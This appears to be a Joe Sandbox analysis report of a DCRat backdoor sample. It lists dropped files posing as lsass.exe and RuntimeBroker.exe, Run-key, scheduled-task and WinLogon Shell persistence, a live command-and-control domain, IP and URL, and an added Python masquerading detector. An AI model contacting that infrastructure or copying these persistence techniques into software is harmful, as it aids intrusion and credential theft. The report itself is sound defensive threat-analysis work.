                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeQueries volume information: C:\Users\user\Desktop\JNKHlxGvw4.exe VolumeInformation
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeQueries volume information: C:\Users\user\Desktop\JNKHlxGvw4.exe VolumeInformation
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeQueries volume information: C:\Program Files\Windows Multimedia Platform\SystemSettings.exe VolumeInformation
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeQueries volume information: C:\Program Files\Windows Multimedia Platform\SystemSettings.exe VolumeInformation
                    Source: C:\Recovery\USZqVcJFLA.exeQueries volume information: C:\Recovery\USZqVcJFLA.exe VolumeInformation
                    Source: C:\Recovery\USZqVcJFLA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeQueries volume information: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe VolumeInformation
                    Source: C:\Recovery\USZqVcJFLA.exeQueries volume information: C:\Recovery\USZqVcJFLA.exe VolumeInformation
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    Source: Yara match; File source: 00000000.00000002.1861105197.00000000128AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: JNKHlxGvw4.exe PID: 6588, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: USZqVcJFLA.exe PID: 1432, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: RuntimeBroker.exe PID: 7808, type: MEMORYSTR
                    Source: Yara match; File source: 0.2.JNKHlxGvw4.exe.1ad80000.6.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.JNKHlxGvw4.exe.1ad80000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000000.00000002.1865882915.000000001AD80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1861105197.0000000012615000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 0.2.JNKHlxGvw4.exe.1ad80000.6.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.JNKHlxGvw4.exe.1ad80000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000000.00000002.1865882915.000000001AD80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                    Remote Access Functionality

                    Source: Yara match; File source: 00000000.00000002.1861105197.00000000128AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: JNKHlxGvw4.exe PID: 6588, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: USZqVcJFLA.exe PID: 1432, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: RuntimeBroker.exe PID: 7808, type: MEMORYSTR
                    Source: Yara match; File source: 0.2.JNKHlxGvw4.exe.1ad80000.6.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.JNKHlxGvw4.exe.1ad80000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000000.00000002.1865882915.000000001AD80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1861105197.0000000012615000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 0.2.JNKHlxGvw4.exe.1ad80000.6.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.JNKHlxGvw4.exe.1ad80000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000000.00000002.1865882915.000000001AD80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    MITRE ATT&CK Matrix (one line per tactic; the number in brackets is the count of matched signatures for that technique; techniques without a count are unmatched template entries of the matrix)

                    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                    Resource Development: Scripting [1]; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                    Execution: Windows Management Instrumentation [11]; Scheduled Task/Job [1]; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                    Persistence: Scripting [1]; DLL Side-Loading [1]; Scheduled Task/Job [1]; Registry Run Keys / Startup Folder [21]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                    Privilege Escalation: DLL Side-Loading [1]; Process Injection [11]; Scheduled Task/Job [1]; Registry Run Keys / Startup Folder [21]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                    Defense Evasion: Disable or Modify Tools [11]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [1]; Software Packing [11]; DLL Side-Loading [1]; File Deletion [1]; Masquerading [133]; Virtualization/Sandbox Evasion [41]; Process Injection [11]
                    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                    Discovery: File and Directory Discovery [2]; System Information Discovery [14]; Security Software Discovery [11]; Process Discovery [1]; Virtualization/Sandbox Evasion [41]; Application Window Discovery [1]; Remote System Discovery [1]; System Network Configuration Discovery [1]; Network Sniffing
                    Lateral Movement: Taint Shared Content [1]; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                    Collection: Archive Collected Data [11]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                    Command and Control: Ingress Tool Transfer [2]; Encrypted Channel [1]; Non-Application Layer Protocol [3]; Application Layer Protocol [13]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                    Behavior Graph (ID: 1572666; Sample: JNKHlxGvw4.exe; Start date: 10/12/2024; Architecture: WINDOWS; Score: 100). Numbers in parentheses after a process name are the created-registry-value and created-file counts shown in the graph.

                    Contacted domain: 188387cm.n9shteam.in
                    Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 15 other signatures

                    JNKHlxGvw4.exe (11, 30), started
                      dropped: C:\Users\user\Favorites\lsass.exe (MS-DOS); C:\Users\user\Desktop\vnccfbfp.log (PE32); C:\Users\user\Desktop\uhdUZoxx.log (PE32); 11 other malicious files
                      signatures: Creates an undocumented autostart registry key; Creates multiple autostart registry keys; Uses schtasks.exe or at.exe to add and modify task schedules; 3 other signatures
                      started: cmd.exe; csc.exe (4); powershell.exe; 6 other processes
                        cmd.exe
                          signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
                          started: USZqVcJFLA.exe; 3 other processes
                            USZqVcJFLA.exe
                              network: 188387cm.n9shteam.in 104.21.16.1, ports 49741, 49762, 49763, CLOUDFLARENETUS United States
                              dropped: C:\Users\user\Desktop\oBKeyAWK.log (PE32); C:\Users\user\Desktop\bSdYXpxm.log (PE32); C:\Users\user\Desktop\OljzCgRG.log (PE32); C:\Users\user\DesktopDQjSEMY.log (PE32)
                        csc.exe (4)
                          dropped: C:\Windows\...\SecurityHealthSystray.exe (PE32)
                          signatures: Infects executable files (exe, dll, sys, html)
                          started: conhost.exe; cvtres.exe (1)
                        powershell.exe
                          signatures: Loading BitLocker PowerShell Module
                          started: conhost.exe; WmiPrvSE.exe
                        6 other processes
                          started: conhost.exe; conhost.exe; 3 other processes
                    USZqVcJFLA.exe, started
                      signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                    lsass.exe (2), started
                    10 other processes, started

                    Antivirus detection for the submitted sample
                    Source | Detection | Scanner | Label
                    JNKHlxGvw4.exe | 79% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
                    JNKHlxGvw4.exe | 100% | Avira | TR/Dropper.Gen
                    JNKHlxGvw4.exe | 100% | Joe Sandbox ML |
                    Antivirus detection for dropped files
                    Source | Detection | Scanner | Label
                    C:\Users\user\AppData\Local\Temp\8DlY2DY8qp.bat | 100% | Avira | BAT/Delbat.C
                    C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | 100% | Avira | TR/Dropper.Gen
                    C:\Recovery\USZqVcJFLA.exe | 100% | Avira | TR/Dropper.Gen
                    C:\Users\user\Desktop\EDQjSEMY.log | 100% | Avira | TR/AVI.Agent.updqb
                    C:\Program Files\Windows Multimedia Platform\SystemSettings.exe | 100% | Avira | TR/Dropper.Gen
                    C:\Users\user\Desktop\RzSYqgUu.log | 100% | Avira | TR/AVI.Agent.updqb
                    C:\Users\user\Desktop\OljzCgRG.log | 100% | Avira | TR/PSW.Agent.qngqt
                    C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | 100% | Joe Sandbox ML |
                    C:\Recovery\USZqVcJFLA.exe | 100% | Joe Sandbox ML |
                    C:\Program Files\Windows Multimedia Platform\SystemSettings.exe | 100% | Joe Sandbox ML |
                    C:\Users\user\Desktop\oBKeyAWK.log | 100% | Joe Sandbox ML |
                    C:\Users\user\Desktop\OljzCgRG.log | 100% | Joe Sandbox ML |
                    C:\Users\user\Desktop\AsBtWtog.log | 100% | Joe Sandbox ML |
                    C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe | 79% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
                    C:\Program Files\Windows Multimedia Platform\SystemSettings.exe | 79% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
                    C:\Recovery\USZqVcJFLA.exe | 79% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
                    C:\Users\user\Desktop\AsBtWtog.log | 8% | ReversingLabs |
                    C:\Users\user\Desktop\EDQjSEMY.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                    C:\Users\user\Desktop\OljzCgRG.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                    C:\Users\user\Desktop\RzSYqgUu.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                    C:\Users\user\Desktop\bSdYXpxm.log | 25% | ReversingLabs |
                    C:\Users\user\Desktop\oBKeyAWK.log | 8% | ReversingLabs |
                    C:\Users\user\Desktop\uhdUZoxx.log | 25% | ReversingLabs |
                    C:\Users\user\Desktop\vnccfbfp.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                    C:\Users\user\Favorites\lsass.exe | 79% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
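                    The dropped-file table above is the concrete evidence behind the report's "Drops PE files with benign system names" and "Files With System Process Name In Unsuspected Locations" signatures: lsass.exe written to the user's Favorites folder, RuntimeBroker.exe under Windows Photo Viewer\en-GB and SystemSettings.exe under Windows Multimedia Platform. The script below is an added example, not Joe Sandbox output or code, of the location check a detection engineer would run over endpoint file-create and process-create telemetry to catch this masquerading. The expected-directory table is an assumption about a stock Windows 10 x64 install, and the tab-separated log lines are constructed for the example from the paths the report lists.

```python
"""Flag executables that carry a Windows system-process name but were
written to, or launched from, a directory where that binary does not live.

Added example for the sandbox report above; not Joe Sandbox code. The
expected-location table is an assumption (stock Windows 10 x64) and the
sample telemetry is constructed from the report's dropped-file paths.
"""
from __future__ import annotations

import ntpath
from dataclasses import dataclass

# Assumption: the only legitimate directories for each system-named binary.
# Keys and directories are lower-case because NTFS paths are case-insensitive.
EXPECTED_DIRS: dict[str, tuple[str, ...]] = {
    "lsass.exe": (r"c:\windows\system32",),
    "runtimebroker.exe": (r"c:\windows\system32",),
    "systemsettings.exe": (r"c:\windows\immersivecontrolpanel",),
}


@dataclass(frozen=True)
class Finding:
    event: str                  # "FileCreate" or "ProcessCreate"
    path: str                   # full path as seen in telemetry
    name: str                   # lower-cased basename that matched
    expected: tuple[str, ...]   # where that binary is allowed to live


def is_masquerading(path: str) -> bool:
    """True when the basename is a known system process name and the
    directory is not one of the locations where that name is expected."""
    name = ntpath.basename(path).lower()
    expected = EXPECTED_DIRS.get(name)
    if expected is None:
        return False                      # not a name we track
    directory = ntpath.dirname(path).lower().rstrip("\\")
    return directory not in expected


def scan_events(lines: list[str]) -> list[Finding]:
    """Parse 'EventType<TAB>Path' lines and return every masquerading hit,
    in input order. Blank lines and '#' comments are ignored."""
    findings: list[Finding] = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        event, _, path = line.partition("\t")
        if is_masquerading(path):
            name = ntpath.basename(path).lower()
            findings.append(Finding(event, path, name, EXPECTED_DIRS[name]))
    return findings


# Constructed sample telemetry: the three system-named drops from the report,
# plus three benign events that must not alert.
SAMPLE_EVENTS = [
    "FileCreate\tC:\\Users\\user\\Favorites\\lsass.exe",
    "FileCreate\tC:\\Program Files (x86)\\Windows Photo Viewer\\en-GB\\RuntimeBroker.exe",
    "ProcessCreate\tC:\\Program Files\\Windows Multimedia Platform\\SystemSettings.exe",
    "ProcessCreate\tC:\\Windows\\System32\\lsass.exe",
    "ProcessCreate\tC:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe",
    "ProcessCreate\tC:\\Users\\user\\Desktop\\JNKHlxGvw4.exe",
]

if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(f"{hit.event}: {hit.path} (expected in {', '.join(hit.expected)})")
```

The check deliberately compares the whole directory rather than looking for a substring such as "System32", since a path like C:\Users\user\System32\lsass.exe would otherwise pass. Extending EXPECTED_DIRS to cover SysWOW64 or WinSxS copies is a per-environment tuning decision; the report's three drops alert under either setting.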
                    No Antivirus matches
                    No Antivirus matches
                    Antivirus detection for URLs
                    Source | Detection | Scanner | Label
                    http://188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php | 100% | Avira URL Cloud | malware
                    http://188387cm.n9shteam.in | 100% | Avira URL Cloud | malware
                    http://188387cm.n9shteam.in/ | 100% | Avira URL Cloud | malware
                    Domains
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    188387cm.n9shteam.in | 104.21.16.1 | true | true | | unknown
                    Contacted URLs
                    Name | Malicious | Antivirus Detection | Reputation
                    http://188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000024.00000002.3152354390.000001C610075000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000025.00000002.1952100669.000001E30022A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 0000001D.00000002.1978904137.000001421EE99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1950205628.000002C880229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1969431867.000001781F659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1946548161.0000013501638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1941235753.000001C600229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1952100669.000001E30022A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://188387cm.n9shteam.in | USZqVcJFLA.exe, 00000035.00000002.2008201045.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, USZqVcJFLA.exe, 00000035.00000002.2008201045.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000025.00000002.1952100669.000001E30022A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://188387cm.n9shteam.in/ | USZqVcJFLA.exe, 00000035.00000002.2008201045.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 0000001D.00000002.1978904137.000001421EE99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1950205628.000002C880229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1969431867.000001781F659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1946548161.0000013501638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1941235753.000001C600229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1952100669.000001E30022A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000024.00000002.3152354390.000001C610075000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000024.00000002.3152354390.000001C610075000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000024.00000002.3152354390.000001C610075000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000024.00000002.3152354390.000001C610075000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 0000001D.00000002.1978904137.000001421EC71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1950205628.000002C880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1969431867.000001781F431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1946548161.0000013501411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1941235753.000001C600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1952100669.000001E300001000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | JNKHlxGvw4.exe, 00000000.00000002.1832050899.0000000002A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1978904137.000001421EC71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1950205628.000002C880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1969431867.000001781F431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1946548161.0000013501411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1941235753.000001C600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1952100669.000001E300001000.00000004.00000800.00020000.00000000.sdmp, USZqVcJFLA.exe, 00000035.00000002.2008201045.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000025.00000002.1952100669.000001E30022A000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
104.21.16.1 | 188387cm.n9shteam.in | United States | | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1572666
Start date and time: 2024-12-10 18:54:02 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 52s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 56
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: JNKHlxGvw4.exe (renamed because original name is a hash value)
Original Sample Name: 6689bd9a5c795eedc631e5fbb850b7ff.exe
Detection: MAL
Classification: mal100.spre.troj.expl.evad.winEXE@47/59@1/1
EGA Information:
• Successful, ratio: 25%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe, schtasks.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
• Excluded domains from analysis (whitelisted): dl.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target RuntimeBroker.exe, PID 7808 because it is empty
• Execution Graph export aborted for target USZqVcJFLA.exe, PID 1432 because it is empty
• Execution Graph export aborted for target USZqVcJFLA.exe, PID 6596 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: JNKHlxGvw4.exe
Time | Type | Description
12:55:09 | API Interceptor | 179x Sleep call for process: powershell.exe modified
12:55:24 | API Interceptor | 1x Sleep call for process: USZqVcJFLA.exe modified
17:55:06 | Task Scheduler | Run new task: lsass path: "C:\Users\user\Favorites\lsass.exe"
17:55:06 | Task Scheduler | Run new task: lsassl path: "C:\Users\user\Favorites\lsass.exe"
17:55:07 | Task Scheduler | Run new task: RuntimeBroker path: "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe"
17:55:07 | Task Scheduler | Run new task: RuntimeBrokerR path: "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe"
17:55:07 | Task Scheduler | Run new task: USZqVcJFLA path: "C:\Recovery\USZqVcJFLA.exe"
17:55:07 | Task Scheduler | Run new task: USZqVcJFLAU path: "C:\Recovery\USZqVcJFLA.exe"
17:55:10 | Task Scheduler | Run new task: JNKHlxGvw4 path: "C:\Users\user\Desktop\JNKHlxGvw4.exe"
17:55:10 | Task Scheduler | Run new task: JNKHlxGvw4J path: "C:\Users\user\Desktop\JNKHlxGvw4.exe"
17:55:10 | Task Scheduler | Run new task: SystemSettings path: "C:\Program Files\Windows Multimedia Platform\SystemSettings.exe"
17:55:10 | Task Scheduler | Run new task: SystemSettingsS path: "C:\Program Files\Windows Multimedia Platform\SystemSettings.exe"
17:55:11 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe"
17:55:20 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run USZqVcJFLA "C:\Recovery\USZqVcJFLA.exe"
17:55:29 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run lsass "C:\Users\user\Favorites\lsass.exe"
17:55:37 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SystemSettings "C:\Program Files\Windows Multimedia Platform\SystemSettings.exe"
17:55:45 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run JNKHlxGvw4 "C:\Users\user\Desktop\JNKHlxGvw4.exe"
17:55:53 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe"
17:56:02 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run USZqVcJFLA "C:\Recovery\USZqVcJFLA.exe"
17:56:10 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run lsass "C:\Users\user\Favorites\lsass.exe"
17:56:18 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SystemSettings "C:\Program Files\Windows Multimedia Platform\SystemSettings.exe"
17:56:26 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run JNKHlxGvw4 "C:\Users\user\Desktop\JNKHlxGvw4.exe"
17:56:34 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe"
17:56:43 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run USZqVcJFLA "C:\Recovery\USZqVcJFLA.exe"
17:56:51 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run lsass "C:\Users\user\Favorites\lsass.exe"
17:56:59 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run SystemSettings "C:\Program Files\Windows Multimedia Platform\SystemSettings.exe"
17:57:07 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run JNKHlxGvw4 "C:\Users\user\Desktop\JNKHlxGvw4.exe"
17:57:23 | Autostart | Run: WinLogon Shell "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe"
17:57:32 | Autostart | Run: WinLogon Shell "C:\Recovery\USZqVcJFLA.exe"
17:57:40 | Autostart | Run: WinLogon Shell "C:\Users\user\Favorites\lsass.exe"
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
104.21.16.1 | http://riginaros.blogspot.com/#x034rT96G0 | Get hash | malicious | Porn Scam | Browse |
 | sjoslin@odeonuk.com_print.svg | Get hash | malicious | Unknown | Browse |
 | file.exe | Get hash | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse |
 | file.exe | Get hash | malicious | LummaC Stealer | Browse |
 | file.exe | Get hash | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | Browse |
 | YewXqKOwfT.exe | Get hash | malicious | LummaC Stealer | Browse |
 | file.exe | Get hash | malicious | LummaC Stealer | Browse |
 | file.exe | Get hash | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | Browse |
 | file.exe | Get hash | malicious | LummaC Stealer | Browse |
                                                                No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | http://enteolcl.top/ | Get hash | malicious | Unknown | Browse | 104.21.112.1
 | ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Get hash | malicious | FormBook | Browse | 104.21.64.208
 | 751ietQPnX.lnk | Get hash | malicious | RHADAMANTHYS | Browse | 172.64.41.3
 | l92fYljXWF.lnk | Get hash | malicious | RHADAMANTHYS | Browse | 172.64.41.3
 | qxjDerXRGR.lnk | Get hash | malicious | RHADAMANTHYS | Browse | 172.64.41.3
 | taCCGTk8n1.lnk | Get hash | malicious | RHADAMANTHYS | Browse | 172.64.41.3
 | Richiesta di Indagine sulla Violazione del Copyright lnk.lnk | Get hash | malicious | Unknown | Browse | 172.64.41.3
 | CMK7DB5YtR.exe | Get hash | malicious | LummaC Stealer | Browse | 104.21.64.1
 | XrQ8NgQHTn.exe | Get hash | malicious | LummaC Stealer | Browse | 104.21.64.1
 | https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#C?email=test@test.com | Get hash | malicious | Captcha Phish | Browse | 172.67.145.201
                                                                No context
